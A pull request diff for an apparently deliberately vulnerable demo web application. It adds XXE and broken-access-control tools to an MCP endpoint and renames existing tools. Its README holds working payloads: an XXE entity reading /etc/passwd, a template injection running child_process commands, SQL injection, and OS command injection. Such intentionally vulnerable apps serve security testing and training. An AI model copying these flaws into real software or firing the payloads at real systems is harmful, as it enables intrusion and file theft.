### PR TITLE
feat(mcp): add XXE and BAC

### DIFF
--- a/README.md
+++ b/README.md
@@ -1229,12 +1229,14 @@ Full configuration & usage examples can be found in our [demo project](https://g
 
 - **MCP (Model Context Protocol) Vulnerabilities** - The application exposes an MCP HTTP endpoint at `/api/mcp` that implements the JSON-RPC 2.0 protocol for AI agent tool calling. This endpoint contains multiple vulnerabilities through its exposed tools and resources:
 
-  - **SQL Injection via count_tool** - The `count_tool` accepts a SQL query parameter and executes it directly against the database without sanitization, similar to the `/api/testimonials/count` endpoint.
-  - **Sensitive Data Exposure via config_tool** - The `config_tool` returns application configuration including database credentials, API keys, and cloud storage URLs.
-  - **Server-Side Template Injection via render_tool** - The `render_tool` accepts a custom template string that is compiled and executed using the doT template engine, allowing arbitrary code execution.
+  - **SQL Injection via get_count** - The `get_count` accepts a SQL query parameter and executes it directly against the database without sanitization, similar to the `/api/testimonials/count` endpoint.
+  - **Sensitive Data Exposure via get_config** - The `get_config` returns application configuration including database credentials, API keys, and cloud storage URLs.
+  - **Server-Side Template Injection via render** - The `render` accepts a custom template string that is compiled and executed using the doT template engine, allowing arbitrary code execution.
   - **Local File Inclusion via MCP resources/read** - The `resources/read` method accepts `file://` URIs and proxies `/api/file/raw`, allowing arbitrary file reads such as `file:///etc/hosts`.
-  - **Server-Side JavaScript Injection via process_numbers_tool** - The `process_numbers_tool` proxies `/api/process_numbers` and executes arbitrary JavaScript from the `processing_expression` expression in server context.
-  - **OS Command Injection via spawn** - The `spawn` executes arbitrary operating system commands through MCP (same vulnerability class as `/api/spawn`) and streams progress over event-stream.
+  - **Server-Side JavaScript Injection via process_numbers** - The `process_numbers` proxies `/api/process_numbers` and executes arbitrary JavaScript from the `processing_expression` expression in server context.
+  - **XML External Entity via get_metadata** - The `get_metadata` proxies `/api/metadata` and processes attacker-controlled XML with external entities enabled (same vulnerability class as `/api/metadata`).
+  - **Broken Access Control via search_users** - The `search_users` proxies `/api/users/search/:name` and returns `application/json` search results.
+  - **OS Command Injection via spawn_process** - The `spawn_process` executes arbitrary operating system commands through MCP (same vulnerability class as `/api/spawn`) and streams progress over event-stream.
   - **Authentication and Session Management** - The `/api/mcp` endpoint supports optional authentication and per-client session tracking:
 
     - MCP sessions are independent from the regular API authentication/authorization flow.
@@ -1250,11 +1252,12 @@ Full configuration & usage examples can be found in our [demo project](https://g
     - If `Authorization: Bearer <jwt>` is provided to `initialize`, the MCP session is marked authenticated.
     - MCP permissions are role-based using the same user model as the HTTP server (`admin` vs regular user).
     - Some tools require authenticated MCP sessions, while others are available without authentication.
-    - `config_tool` is admin-only.
-    - `render_tool` responds as `text/event-stream`:
+    - `get_config` is admin-only.
+    - `render` responds as `text/event-stream`:
       `event: message` + `data: <json-rpc-payload>`.
-    - `spawn` responds as `text/event-stream`:
+    - `spawn_process` responds as `text/event-stream`:
       `event: notification` + `data: <progress-payload>` before execution and every ~5 seconds while running, partial command output via `event: notification` + `data: <partial-output-payload>`, then `event: message` + `data: <json-rpc-payload>`.
+    - `search_users` proxies `/api/users/search/:name` and returns `application/json` data.
 
   - **MCP Tool/Resource List (Quick Reference)**:
 
@@ -1268,7 +1271,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
     MCP_SESSION_ID=$(echo "$INIT" | awk -F': ' 'tolower($1)=="mcp-session-id"{print $2}' | tr -d '\r')
     ```
 
-    1. `count_tool` (public)  
+    1. `get_count` (public)  
        Vulnerability: **SQL Injection**.  
        Example:
 
@@ -1280,7 +1283,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
            "jsonrpc": "2.0",
            "method": "tools/call",
            "params": {
-             "name": "count_tool",
+             "name": "get_count",
              "arguments": {
                "query": "select count(*) as count from testimonial"
              }
@@ -1289,7 +1292,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
          }'
        ```
 
-    2. `render_tool` (public)  
+    2. `render` (public)  
        Vulnerability: **Server-Side Template Injection (SSTI)** via user-controlled doT template.  
        Example:
 
@@ -1301,7 +1304,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
            "jsonrpc": "2.0",
            "method": "tools/call",
            "params": {
-             "name": "render_tool",
+             "name": "render",
              "arguments": {
                "numbers": [1],
                "template": "The node version is: {{=process.version}}"
@@ -1338,7 +1341,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
          }'
        ```
 
-    4. `process_numbers_tool` (public)  
+    4. `process_numbers` (public)  
        Vulnerability: **Server-Side JavaScript Injection (SSJI)** via dynamic code execution.  
        Example:
 
@@ -1350,7 +1353,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
            "jsonrpc": "2.0",
            "method": "tools/call",
            "params": {
-            "name": "process_numbers_tool",
+            "name": "process_numbers",
             "arguments": {
               "numbers": [1, 2, 3],
               "processing_expression": "numbers.reduce((acc, num) => acc + num, 0)"
@@ -1360,7 +1363,49 @@ Full configuration & usage examples can be found in our [demo project](https://g
          }'
        ```
 
-    5. `spawn` (admin only)  
+    5. `get_metadata` (public)  
+       Vulnerability: **XML External Entity (XXE)** via proxied `/api/metadata` XML parsing.  
+       Example:
+
+       ```bash
+       curl "${BASE}/api/mcp" -X POST \
+         -H 'Content-Type: application/json' \
+         -H "Mcp-Session-Id: ${MCP_SESSION_ID}" \
+         -d '{
+           "jsonrpc": "2.0",
+           "method": "tools/call",
+           "params": {
+            "name": "get_metadata",
+            "arguments": {
+              "xml": "<root><username>John</username></root>"
+            }
+          },
+         "id": 7
+         }'
+       ```
+
+    6. `search_users` (public)  
+       Vulnerability: **Broken Access Control** via proxied user search.  
+       Example:
+
+       ```bash
+       curl "${BASE}/api/mcp" -X POST \
+         -H 'Content-Type: application/json' \
+         -H "Mcp-Session-Id: ${MCP_SESSION_ID}" \
+         -d '{
+           "jsonrpc": "2.0",
+           "method": "tools/call",
+           "params": {
+            "name": "search_users",
+            "arguments": {
+              "name": "ad"
+            }
+          },
+         "id": 8
+         }'
+       ```
+
+    7. `spawn_process` (admin only)  
        Vulnerability: **OS Command Injection** with progress notifications over SSE.  
        Example:
 
@@ -1372,12 +1417,12 @@ Full configuration & usage examples can be found in our [demo project](https://g
            "jsonrpc": "2.0",
            "method": "tools/call",
            "params": {
-            "name": "spawn",
+            "name": "spawn_process",
             "arguments": {
               "command": "ping -c 4 127.0.0.1"
             }
           },
-          "id": 7
+          "id": 9
          }'
        ```
 
@@ -1388,7 +1433,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
        - `event: notification` with method `notifications/partial_output` for stdout/stderr chunks
        - `event: message` containing final JSON-RPC tool result
 
-    6. `config_tool` (admin only)  
+    8. `get_config` (admin only)  
        Vulnerability: **Sensitive Data Exposure** (returns app configuration including secrets when allowed).  
        Example (admin-authenticated MCP session):
 
@@ -1411,12 +1456,12 @@ Full configuration & usage examples can be found in our [demo project](https://g
            "jsonrpc": "2.0",
            "method": "tools/call",
            "params": {
-             "name": "config_tool",
+             "name": "get_config",
              "arguments": {
                "include_sensitive": true
              }
            },
-           "id": 5
+           "id": 10
          }'
        ```
 
@@ -1445,7 +1490,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
     -d '{"jsonrpc":"2.0","method":"resources/list","id":3}'
   ```
 
-  2. **SQL Injection via count_tool**:
+  2. **SQL Injection via get_count**:
 
      ```bash
      curl "${BASE}/api/mcp" -X POST \
@@ -1455,7 +1500,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
          "jsonrpc": "2.0",
          "method": "tools/call",
          "params": {
-           "name": "count_tool",
+           "name": "get_count",
            "arguments": {
              "query": "select count(table_name) as count from information_schema.tables"
            }
@@ -1476,7 +1521,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
      }
      ```
 
-  3. **Sensitive Data Exposure via config_tool** (admin-authenticated MCP session):
+  3. **Sensitive Data Exposure via get_config** (admin-authenticated MCP session):
 
      ```bash
      AUTH_HEADERS=$(curl -i -s "${BASE}/api/auth/admin/login" -X POST \
@@ -1497,7 +1542,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
          "jsonrpc": "2.0",
          "method": "tools/call",
          "params": {
-           "name": "config_tool",
+           "name": "get_config",
             "arguments": {}
           },
          "id": 4
@@ -1539,7 +1584,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
 
      This payload reads local server files through the `/api/file/raw` proxy using a `file://` URI.
 
-  5. **Server-Side JavaScript Injection via process_numbers_tool**:
+  5. **Server-Side JavaScript Injection via process_numbers**:
 
      ```bash
      curl "${BASE}/api/mcp" -X POST \
@@ -1549,7 +1594,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
          "jsonrpc": "2.0",
          "method": "tools/call",
          "params": {
-           "name": "process_numbers_tool",
+           "name": "process_numbers",
            "arguments": {
              "numbers": [1, 2, 3],
              "processing_expression": "numbers.reduce((acc, num) => acc + num, 0)"
@@ -1561,28 +1606,7 @@ Full configuration & usage examples can be found in our [demo project](https://g
 
      This payload executes JavaScript directly on the server.
 
-  6. **OS Command Injection via spawn**:
-
-     ```bash
-     curl -N "${BASE}/api/mcp" -X POST \
-       -H 'Content-Type: application/json' \
-       -H "Mcp-Session-Id: ${MCP_SESSION_ID}" \
-       -d '{
-         "jsonrpc": "2.0",
-         "method": "tools/call",
-         "params": {
-           "name": "spawn",
-           "arguments": {
-             "command": "uname -a"
-           }
-         },
-         "id": 7
-       }'
-     ```
-
-     Response is streamed as SSE and ends with an `event: message` JSON-RPC payload containing command output.
-
-  7. **Server-Side Template Injection via render_tool**:
+  6. **XML External Entity via get_metadata**:
 
      ```bash
      curl "${BASE}/api/mcp" -X POST \
@@ -1592,13 +1616,76 @@ Full configuration & usage examples can be found in our [demo project](https://g
          "jsonrpc": "2.0",
          "method": "tools/call",
          "params": {
-           "name": "render_tool",
+           "name": "get_metadata",
+           "arguments": {
+             "xml": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE replace [<!ENTITY mcp_xxe SYSTEM \"file://etc/passwd\">]><root>&mcp_xxe;</root>"
+           }
+         },
+         "id": 7
+       }'
+     ```
+
+     This payload proxies XML with external entity definitions to `/api/metadata`.
+
+  7. **User Search Enumeration via search_users**:
+
+     ```bash
+     curl "${BASE}/api/mcp" -X POST \
+       -H 'Content-Type: application/json' \
+       -H "Mcp-Session-Id: ${MCP_SESSION_ID}" \
+       -d '{
+         "jsonrpc": "2.0",
+         "method": "tools/call",
+         "params": {
+           "name": "search_users",
+           "arguments": {
+             "name": "ad"
+           }
+         },
+         "id": 8
+       }'
+     ```
+
+     This payload proxies `/api/users/search/:name` and returns JSON user search results.
+
+  8. **OS Command Injection via spawn_process**:
+
+     ```bash
+     curl -N "${BASE}/api/mcp" -X POST \
+       -H 'Content-Type: application/json' \
+       -H "Mcp-Session-Id: ${MCP_SESSION_ID}" \
+       -d '{
+         "jsonrpc": "2.0",
+         "method": "tools/call",
+         "params": {
+           "name": "spawn_process",
+           "arguments": {
+             "command": "uname -a"
+           }
+         },
+         "id": 9
+       }'
+     ```
+
+     Response is streamed as SSE and ends with an `event: message` JSON-RPC payload containing command output.
+
+  9. **Server-Side Template Injection via render**:
+
+     ```bash
+     curl "${BASE}/api/mcp" -X POST \
+       -H 'Content-Type: application/json' \
+       -H "Mcp-Session-Id: ${MCP_SESSION_ID}" \
+       -d '{
+         "jsonrpc": "2.0",
+         "method": "tools/call",
+         "params": {
+           "name": "render",
            "arguments": {
              "numbers": [1],
              "template": "{{= global.process.mainModule.require('\''child_process'\'').execSync('\''ls -la'\'') }}"
            }
          },
-         "id": 8
+         "id": 10
        }'
      ```
 

--- a/src/mcp/api/mcp.types.ts
+++ b/src/mcp/api/mcp.types.ts
@@ -134,6 +134,14 @@ export interface SpawnToolInput {
   command: string;
 }
 
+export interface MetadataToolInput {
+  xml: string;
+}
+
+export interface SearchUsersToolInput {
+  name: string;
+}
+
 // Type guards for runtime validation
 export function isCountToolInput(args: unknown): args is CountToolInput {
   return (
@@ -222,5 +230,37 @@ export function isSpawnToolInput(args: unknown): args is SpawnToolInput {
     'command' in args &&
     typeof command === 'string' &&
     command.trim().length > 0
+  );
+}
+
+export function isMetadataToolInput(args: unknown): args is MetadataToolInput {
+  const xml =
+    typeof args === 'object' && args !== null
+      ? (args as Record<string, unknown>).xml
+      : undefined;
+
+  return (
+    typeof args === 'object' &&
+    args !== null &&
+    'xml' in args &&
+    typeof xml === 'string' &&
+    xml.trim().length > 0
+  );
+}
+
+export function isSearchUsersToolInput(
+  args: unknown
+): args is SearchUsersToolInput {
+  const name =
+    typeof args === 'object' && args !== null
+      ? (args as Record<string, unknown>).name
+      : undefined;
+
+  return (
+    typeof args === 'object' &&
+    args !== null &&
+    'name' in args &&
+    typeof name === 'string' &&
+    name.trim().length > 0
   );
 }

--- a/src/mcp/mcp.controller.swagger.desc.ts
+++ b/src/mcp/mcp.controller.swagger.desc.ts
@@ -28,11 +28,13 @@ Supported methods:
 - DELETE /api/mcp: Explicitly terminate an MCP session
 
 Available tools:
-- count_tool: Count testimonials using SQL query
-- config_tool: Get application configuration (admin only)
-- render_tool: Sum numbers and render result (response is text/event-stream)
-- process_numbers_tool: Process numbers via /api/process_numbers (requires numbers and processing_expression)
-- spawn: Execute OS commands via MCP (admin only; same injection behavior as /api/spawn; response is text/event-stream with progress notifications every 5 seconds and partial stdout/stderr output notifications)
+- get_count: Count testimonials using SQL query
+- get_config: Get application configuration (admin only)
+- render: Sum numbers and render result (response is text/event-stream)
+- process_numbers: Process numbers via /api/process_numbers (requires numbers and processing_expression)
+- get_metadata: Proxy /api/metadata XML payload processing (public; same XXE behavior as /api/metadata)
+- spawn_process: Execute OS commands via MCP (admin only; same injection behavior as /api/spawn; response is text/event-stream with progress notifications every 5 seconds and partial stdout/stderr output notifications)
+- search_users: Proxy /api/users/search/:name and return application/json payload (public)
 
 Available resources:
 - file:///: Read local server files via /api/file/raw proxy

--- a/src/mcp/mcp.controller.ts
+++ b/src/mcp/mcp.controller.ts
@@ -55,7 +55,7 @@ interface ResolvedStreamedTool {
 export class McpController {
   private static readonly MCP_SESSION_ID_HEADER = 'Mcp-Session-Id';
   private static readonly STREAMED_TOOLS: Record<string, StreamedToolConfig> = {
-    spawn: {
+    spawn_process: {
       heartbeatMs: 5000,
       emitPartialOutput: true,
       getMetadata: (params) => ({
@@ -67,7 +67,7 @@ export class McpController {
     }
   };
   private static readonly EVENT_STREAM_TOOLS = new Set<string>([
-    'render_tool',
+    'render',
     ...Object.keys(McpController.STREAMED_TOOLS)
   ]);
 
@@ -97,7 +97,7 @@ export class McpController {
           id: 0
         }
       },
-      list_tools: {
+      listTools: {
         summary: 'List available tools',
         value: {
           jsonrpc: '2.0',
@@ -105,13 +105,13 @@ export class McpController {
           id: 1
         }
       },
-      call_count_tool: {
-        summary: 'Call count_tool',
+      call_get_count: {
+        summary: 'Call get_count',
         value: {
           jsonrpc: '2.0',
           method: 'tools/call',
           params: {
-            name: 'count_tool',
+            name: 'get_count',
             arguments: {
               query: 'select count(*) as count from testimonial'
             }
@@ -119,13 +119,13 @@ export class McpController {
           id: 2
         }
       },
-      call_config_tool: {
-        summary: 'Call config_tool',
+      call_get_config: {
+        summary: 'Call get_config',
         value: {
           jsonrpc: '2.0',
           method: 'tools/call',
           params: {
-            name: 'config_tool',
+            name: 'get_config',
             arguments: {
               include_sensitive: true
             }
@@ -133,13 +133,13 @@ export class McpController {
           id: 3
         }
       },
-      call_render_tool: {
-        summary: 'Call render_tool',
+      call_render: {
+        summary: 'Call render',
         value: {
           jsonrpc: '2.0',
           method: 'tools/call',
           params: {
-            name: 'render_tool',
+            name: 'render',
             arguments: {
               numbers: [1, 2, 3, 4, 5]
             }
@@ -147,13 +147,13 @@ export class McpController {
           id: 4
         }
       },
-      call_render_tool_with_template: {
-        summary: 'Call render_tool with custom template',
+      call_render_with_template: {
+        summary: 'Call render with custom template',
         value: {
           jsonrpc: '2.0',
           method: 'tools/call',
           params: {
-            name: 'render_tool',
+            name: 'render',
             arguments: {
               numbers: [10, 20, 30],
               template: 'Result: {{=it.sum}}'
@@ -181,13 +181,13 @@ export class McpController {
           id: 7
         }
       },
-      call_process_numbers_tool: {
-        summary: 'Call process_numbers_tool',
+      call_process_numbers: {
+        summary: 'Call process_numbers',
         value: {
           jsonrpc: '2.0',
           method: 'tools/call',
           params: {
-            name: 'process_numbers_tool',
+            name: 'process_numbers',
             arguments: {
               numbers: [1, 2, 3, 4],
               processing_expression:
@@ -197,18 +197,46 @@ export class McpController {
           id: 8
         }
       },
-      call_spawn: {
-        summary: 'Call spawn',
+      call_get_metadata: {
+        summary: 'Call get_metadata',
         value: {
           jsonrpc: '2.0',
           method: 'tools/call',
           params: {
-            name: 'spawn',
+            name: 'get_metadata',
+            arguments: {
+              xml: '<root><username>John</username></root>'
+            }
+          },
+          id: 9
+        }
+      },
+      call_spawn_process: {
+        summary: 'Call spawn_process',
+        value: {
+          jsonrpc: '2.0',
+          method: 'tools/call',
+          params: {
+            name: 'spawn_process',
             arguments: {
               command: 'uname -a'
             }
           },
-          id: 9
+          id: 10
+        }
+      },
+      call_search_users: {
+        summary: 'Call search_users',
+        value: {
+          jsonrpc: '2.0',
+          method: 'tools/call',
+          params: {
+            name: 'search_users',
+            arguments: {
+              name: 'ad'
+            }
+          },
+          id: 11
         }
       }
     }

--- a/src/mcp/mcp.tool-executor.service.ts
+++ b/src/mcp/mcp.tool-executor.service.ts
@@ -5,9 +5,11 @@ import * as dotT from 'dot';
 import {
   ConfigToolInput,
   CountToolInput,
+  MetadataToolInput,
   McpToolResult,
   ProcessNumbersToolInput,
   RenderToolInput,
+  SearchUsersToolInput,
   SpawnToolInput
 } from './api/mcp.types';
 import { McpProxySupport } from './mcp.proxy-support';
@@ -33,25 +35,35 @@ export class McpToolExecutorService extends McpProxySupport {
     context: McpToolExecutionContext = {}
   ): Promise<McpToolResult> {
     switch (toolName) {
-      case 'count_tool':
+      case 'get_count':
         return this.executeCountTool(
           args as CountToolInput,
           context.authorizationHeader
         );
-      case 'config_tool':
+      case 'get_config':
         return this.executeConfigTool(
           args as ConfigToolInput,
           context.authorizationHeader
         );
-      case 'render_tool':
+      case 'render':
         return this.executeRenderTool(args as RenderToolInput);
-      case 'process_numbers_tool':
+      case 'process_numbers':
         return this.executeProcessNumbersTool(
           args as ProcessNumbersToolInput,
           context.authorizationHeader
         );
-      case 'spawn':
+      case 'spawn_process':
         return this.executeSpawnTool(args as SpawnToolInput, context);
+      case 'get_metadata':
+        return this.executeMetadataTool(
+          args as MetadataToolInput,
+          context.authorizationHeader
+        );
+      case 'search_users':
+        return this.executeSearchUsersTool(
+          args as SearchUsersToolInput,
+          context.authorizationHeader
+        );
     }
   }
 
@@ -73,7 +85,7 @@ export class McpToolExecutorService extends McpProxySupport {
       });
 
       if (response.status !== 200) {
-        return this.proxyError('count_tool', response);
+        return this.proxyError('get_count', response);
       }
 
       const text =
@@ -110,7 +122,7 @@ export class McpToolExecutorService extends McpProxySupport {
       });
 
       if (response.status !== 200) {
-        return this.proxyError('config_tool', response);
+        return this.proxyError('get_config', response);
       }
 
       const config =
@@ -176,7 +188,7 @@ export class McpToolExecutorService extends McpProxySupport {
     authorizationHeader?: string
   ): Promise<McpToolResult> {
     try {
-      this.logger.debug('Processing crystals via MCP process_numbers_tool');
+      this.logger.debug('Processing crystals via MCP process_numbers');
 
       const response = await axios.post(
         this.endpoint('/api/process_numbers'),
@@ -196,7 +208,7 @@ export class McpToolExecutorService extends McpProxySupport {
       );
 
       if (response.status !== 200) {
-        return this.proxyError('process_numbers_tool', response);
+        return this.proxyError('process_numbers', response);
       }
 
       const text =
@@ -225,7 +237,7 @@ export class McpToolExecutorService extends McpProxySupport {
     context: McpToolExecutionContext = {}
   ): Promise<McpToolResult> {
     try {
-      this.logger.debug('Executing OS command via MCP spawn');
+      this.logger.debug('Executing OS command via MCP spawn_process');
 
       const [exec, ...args] = input.command.split(' ');
       if (!exec || !exec.trim().length) {
@@ -233,7 +245,7 @@ export class McpToolExecutorService extends McpProxySupport {
           content: [
             {
               type: 'text',
-              text: 'Error: spawn command is empty'
+              text: 'Error: spawn_process command is empty'
             }
           ],
           isError: true
@@ -276,6 +288,88 @@ export class McpToolExecutorService extends McpProxySupport {
           {
             type: 'text',
             text: `OS command result: ${text}`
+          }
+        ]
+      };
+    } catch (error) {
+      return {
+        content: [{ type: 'text', text: `Error: ${(error as Error).message}` }],
+        isError: true
+      };
+    }
+  }
+
+  private async executeMetadataTool(
+    input: MetadataToolInput,
+    authorizationHeader?: string
+  ): Promise<McpToolResult> {
+    try {
+      this.logger.debug('Proxy metadata via /api/metadata');
+
+      const response = await axios.post(
+        this.endpoint('/api/metadata'),
+        input.xml,
+        {
+          headers: this.buildProxyHeaders(authorizationHeader, 'text/plain'),
+          responseType: 'text',
+          transformResponse: [(data: string) => data],
+          validateStatus: () => true
+        }
+      );
+
+      if (response.status < 200 || response.status >= 300) {
+        return this.proxyError('get_metadata', response);
+      }
+
+      const text =
+        typeof response.data === 'string'
+          ? response.data
+          : String(response.data);
+
+      return {
+        content: [
+          {
+            type: 'text',
+            text
+          }
+        ]
+      };
+    } catch (error) {
+      return {
+        content: [{ type: 'text', text: `Error: ${(error as Error).message}` }],
+        isError: true
+      };
+    }
+  }
+
+  private async executeSearchUsersTool(
+    input: SearchUsersToolInput,
+    authorizationHeader?: string
+  ): Promise<McpToolResult> {
+    try {
+      this.logger.debug('Proxy users search via /api/users/search/:name');
+
+      const response = await axios.get(
+        this.endpoint(`/api/users/search/${encodeURIComponent(input.name)}`),
+        {
+          headers: {
+            ...this.buildProxyHeaders(authorizationHeader),
+            accept: 'application/json'
+          },
+          responseType: 'json',
+          validateStatus: () => true
+        }
+      );
+
+      if (response.status !== 200) {
+        return this.proxyError('search_users', response);
+      }
+
+      return {
+        content: [
+          {
+            type: 'text',
+            text: JSON.stringify(response.data, null, 2)
           }
         ]
       };

--- a/src/mcp/mcp.tool-registry.ts
+++ b/src/mcp/mcp.tool-registry.ts
@@ -1,18 +1,22 @@
 import {
   isConfigToolInput,
   isCountToolInput,
+  isMetadataToolInput,
   isProcessNumbersToolInput,
   isRenderToolInput,
+  isSearchUsersToolInput,
   isSpawnToolInput,
   McpTool
 } from './api/mcp.types';
 
 export type McpToolName =
-  | 'count_tool'
-  | 'config_tool'
-  | 'render_tool'
-  | 'process_numbers_tool'
-  | 'spawn';
+  | 'get_count'
+  | 'get_config'
+  | 'render'
+  | 'process_numbers'
+  | 'spawn_process'
+  | 'get_metadata'
+  | 'search_users';
 
 export interface McpToolRegistration {
   definition: McpTool;
@@ -22,9 +26,9 @@ export interface McpToolRegistration {
 }
 
 export const MCP_TOOL_REGISTRY: Record<McpToolName, McpToolRegistration> = {
-  count_tool: {
+  get_count: {
     definition: {
-      name: 'count_tool',
+      name: 'get_count',
       description:
         'Proxy to /api/testimonials/count. Accepts a SQL query and returns count.',
       accessLevel: 'public',
@@ -42,12 +46,12 @@ export const MCP_TOOL_REGISTRY: Record<McpToolName, McpToolRegistration> = {
     },
     validate: (args: unknown) => isCountToolInput(args),
     invalidArgsMessage:
-      'Invalid arguments: count_tool requires a "query" string parameter'
+      'Invalid arguments: get_count requires a "query" string parameter'
   },
 
-  config_tool: {
+  get_config: {
     definition: {
-      name: 'config_tool',
+      name: 'get_config',
       description:
         'Proxy to /api/config. Returns application configuration including database and cloud settings.',
       accessLevel: 'admin',
@@ -65,13 +69,13 @@ export const MCP_TOOL_REGISTRY: Record<McpToolName, McpToolRegistration> = {
     },
     validate: (args: unknown) => isConfigToolInput(args),
     invalidArgsMessage:
-      'Invalid arguments: config_tool expects optional "include_sensitive" boolean parameter',
+      'Invalid arguments: get_config expects optional "include_sensitive" boolean parameter',
     normalize: (args: unknown) => args ?? {}
   },
 
-  render_tool: {
+  render: {
     definition: {
-      name: 'render_tool',
+      name: 'render',
       description: 'Adds numbers and renders output via doT template.',
       accessLevel: 'public',
       inputSchema: {
@@ -92,12 +96,12 @@ export const MCP_TOOL_REGISTRY: Record<McpToolName, McpToolRegistration> = {
     },
     validate: (args: unknown) => isRenderToolInput(args),
     invalidArgsMessage:
-      'Invalid arguments: render_tool requires a "numbers" array parameter'
+      'Invalid arguments: render requires a "numbers" array parameter'
   },
 
-  process_numbers_tool: {
+  process_numbers: {
     definition: {
-      name: 'process_numbers_tool',
+      name: 'process_numbers',
       description:
         'Proxy to /api/process_numbers. Processes number arrays with a required expression.',
       accessLevel: 'public',
@@ -119,12 +123,12 @@ export const MCP_TOOL_REGISTRY: Record<McpToolName, McpToolRegistration> = {
     },
     validate: (args: unknown) => isProcessNumbersToolInput(args),
     invalidArgsMessage:
-      'Invalid arguments: process_numbers_tool requires "numbers" array and non-empty "processing_expression" string'
+      'Invalid arguments: process_numbers requires "numbers" array and non-empty "processing_expression" string'
   },
 
-  spawn: {
+  spawn_process: {
     definition: {
-      name: 'spawn',
+      name: 'spawn_process',
       description:
         'Executes an arbitrary operating system command (same OS command injection behavior as /api/spawn).',
       accessLevel: 'admin',
@@ -141,7 +145,51 @@ export const MCP_TOOL_REGISTRY: Record<McpToolName, McpToolRegistration> = {
     },
     validate: (args: unknown) => isSpawnToolInput(args),
     invalidArgsMessage:
-      'Invalid arguments: spawn requires a non-empty "command" string parameter'
+      'Invalid arguments: spawn_process requires a non-empty "command" string parameter'
+  },
+
+  get_metadata: {
+    definition: {
+      name: 'get_metadata',
+      description:
+        'Proxy to /api/metadata. Accepts XML payload and returns parsed XML output.',
+      accessLevel: 'public',
+      inputSchema: {
+        type: 'object',
+        properties: {
+          xml: {
+            type: 'string',
+            description: 'XML payload forwarded to /api/metadata'
+          }
+        },
+        required: ['xml']
+      }
+    },
+    validate: (args: unknown) => isMetadataToolInput(args),
+    invalidArgsMessage:
+      'Invalid arguments: get_metadata requires a non-empty "xml" string parameter'
+  },
+
+  search_users: {
+    definition: {
+      name: 'search_users',
+      description:
+        'Proxy to /api/users/search/:name. Returns a JSON array of matching users.',
+      accessLevel: 'public',
+      inputSchema: {
+        type: 'object',
+        properties: {
+          name: {
+            type: 'string',
+            description: 'Prefix used to search users by first name'
+          }
+        },
+        required: ['name']
+      }
+    },
+    validate: (args: unknown) => isSearchUsersToolInput(args),
+    invalidArgsMessage:
+      'Invalid arguments: search_users requires a non-empty "name" string parameter'
   }
 };
 

--- a/test/mcp.e2e-spec.ts
+++ b/test/mcp.e2e-spec.ts
@@ -292,7 +292,7 @@ describe('/api', () => {
             jsonrpc: '2.0',
             method: 'tools/call',
             params: {
-              name: 'config_tool',
+              name: 'get_config',
               arguments: {}
             },
             id: 3
@@ -317,7 +317,7 @@ describe('/api', () => {
             jsonrpc: '2.0',
             method: 'tools/call',
             params: {
-              name: 'config_tool',
+              name: 'get_config',
               arguments: {}
             },
             id: 4
@@ -340,7 +340,7 @@ describe('/api', () => {
             jsonrpc: '2.0',
             method: 'tools/call',
             params: {
-              name: 'config_tool',
+              name: 'get_config',
               arguments: {}
             },
             id: 5
@@ -356,15 +356,15 @@ describe('/api', () => {
       });
     });
 
-    describe('render_tool (event-stream)', () => {
-      it('should return event-stream payload for render_tool', async () => {
+    describe('render (event-stream)', () => {
+      it('should return event-stream payload for render', async () => {
         const mcpSession = await initializeMcpSession();
         const response = await postMcp(
           {
             jsonrpc: '2.0',
             method: 'tools/call',
             params: {
-              name: 'render_tool',
+              name: 'render',
               arguments: {
                 numbers: [1, 2, 3],
                 template: 'Result: {{=it.sum}}'
@@ -389,8 +389,8 @@ describe('/api', () => {
       });
     });
 
-    describe('spawn (event-stream with notifications)', () => {
-      it('should stream progress notifications and final JSON-RPC result for spawn', async () => {
+    describe('spawn_process (event-stream with notifications)', () => {
+      it('should stream progress notifications and final JSON-RPC result for spawn_process', async () => {
         const token = await loginForMcp('admin', 'admin');
         const mcpSession = await initializeMcpSession(token);
         const response = await postMcp(
@@ -398,7 +398,7 @@ describe('/api', () => {
             jsonrpc: '2.0',
             method: 'tools/call',
             params: {
-              name: 'spawn',
+              name: 'spawn_process',
               arguments: {
                 command: 'node -e console.log(process.version)'
               }
@@ -431,7 +431,7 @@ describe('/api', () => {
         const progressParams = progressNotifications[0]?.params as
           | Record<string, unknown>
           | undefined;
-        expect(progressParams?.tool).toBe('spawn');
+        expect(progressParams?.tool).toBe('spawn_process');
         expect(progressParams?.status).toBe('starting');
 
         const partialOutputNotifications = notifications.filter(
@@ -443,7 +443,7 @@ describe('/api', () => {
         const partialParams = partialOutputNotifications[0]?.params as
           | Record<string, unknown>
           | undefined;
-        expect(partialParams?.tool).toBe('spawn');
+        expect(partialParams?.tool).toBe('spawn_process');
         expect(['stdout', 'stderr']).toContain(partialParams?.stream);
         expect(typeof partialParams?.text).toBe('string');
 
@@ -482,15 +482,15 @@ describe('/api', () => {
       });
     });
 
-    describe('process_numbers_tool', () => {
-      it('should allow guest MCP session to execute JavaScript via process_numbers_tool', async () => {
+    describe('process_numbers', () => {
+      it('should allow guest MCP session to execute JavaScript via process_numbers', async () => {
         const mcpSession = await initializeMcpSession();
         const response = await postMcp(
           {
             jsonrpc: '2.0',
             method: 'tools/call',
             params: {
-              name: 'process_numbers_tool',
+              name: 'process_numbers',
               arguments: {
                 numbers: [1, 2, 3],
                 processing_expression:
@@ -509,6 +509,65 @@ describe('/api', () => {
         expect(response.data?.result?.content?.[0]?.text).toContain(
           'SSJI result: 6'
         );
+      });
+    });
+
+    describe('get_metadata', () => {
+      it('should proxy XML payload to /api/metadata for guest MCP session', async () => {
+        const mcpSession = await initializeMcpSession();
+        const response = await postMcp(
+          {
+            jsonrpc: '2.0',
+            method: 'tools/call',
+            params: {
+              name: 'get_metadata',
+              arguments: {
+                xml: '<root><username>John</username></root>'
+              }
+            },
+            id: 11
+          },
+          {
